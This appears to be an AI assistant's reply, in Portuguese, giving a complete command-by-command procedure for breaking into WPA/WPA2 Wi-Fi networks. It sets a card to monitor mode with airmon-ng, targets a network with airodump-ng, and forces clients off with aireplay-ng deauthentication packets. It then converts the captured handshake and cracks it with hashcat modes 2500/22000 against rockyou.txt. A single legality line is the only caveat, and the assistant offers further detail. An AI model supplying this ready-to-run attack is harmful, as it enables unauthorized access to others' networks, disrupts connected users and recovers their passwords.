Para capturar pacotes de autenticação Wi-Fi (como handshakes WPA/WPA2) e posteriormente tentar quebrá-los com o **Hashcat**, siga os passos abaixo: --- ### **1. Capturar o Handshake Wi-Fi** Use o **Airodump-ng** (parte do suite `aircrack-ng`) para monitorar redes Wi-Fi e capturar o handshake: ```bash sudo airmon-ng start wlan0 # Ativar modo monitor (substitua "wlan0" pela sua interface) sudo airodump-ng wlan0mon # Listar redes Wi-Fi disponíveis ``` Quando encontrar a rede alvo, execute: ```bash sudo airodump-ng -c <CHANNEL> --bssid <BSSID> -w <OUTPUT_FILE> wlan0mon ``` - **`-c <CHANNEL>`**: Canal da rede alvo. - **`--bssid <BSSID>`**: Endereço MAC do roteador. - **`-w <OUTPUT_FILE>`**: Nome do arquivo de saída (ex: `captura`). #### **Forçar Captura do Handshake:** Abra outro terminal e force uma desconexão/reconexão de um cliente usando **aireplay-ng**: ```bash sudo aireplay-ng -0 4 -a <BSSID> -c <CLIENT_MAC> wlan0mon ``` - **`-0 4`**: Envia 4 pacotes de deautenticação. - **`-a <BSSID>`**: MAC do roteador. - **`-c <CLIENT_MAC>`**: MAC do cliente (opcional). Quando o handshake for capturado, aparecerá `"WPA handshake: <BSSID>"` no **airodump-ng**. --- ### **2. Salvar o Handshake para o Hashcat** O arquivo `.cap` gerado pode ser convertido para o formato `.hccapx` (compatível com Hashcat) usando: ```bash aircrack-ng -J <OUTPUT_HCCAPX> <INPUT_CAP> ``` - Exemplo: ```bash aircrack-ng -J handshake captura-01.cap ``` Isso gerará `handshake.hccapx`. --- ### **3. Quebrar o Handshake com Hashcat** Use o Hashcat no modo **WPA/WPA2** (modo `22000` para arquivos `.cap` ou `2500` para `.hccapx`): ```bash hashcat -m 2500 handshake.hccapx wordlist.txt ``` - **`-m 2500`**: Modo WPA/WPA2 (para `.hccapx`). - **`wordlist.txt`**: Arquivo com senhas para teste (ex: `rockyou.txt`). #### **Para arquivos `.cap` modernos (Hashcat v6+):** Converta para `.hc22000` (formato mais novo): ```bash hcxpcapngtool -o handshake.hc22000 captura-01.cap ``` E use o modo `22000`: ```bash hashcat -m 22000 handshake.hc22000 wordlist.txt ``` --- ### **Observações Importantes:** - **Legalidade**: Só capture handshakes de redes que você tem permissão para testar. - **Wordlists**: Use listas eficientes como `rockyou.txt` ou gere senhas com `crunch`. - **GPU**: Hashcat funciona melhor com GPUs poderosas. Se precisar de mais detalhes, posso explicar etapas específicas!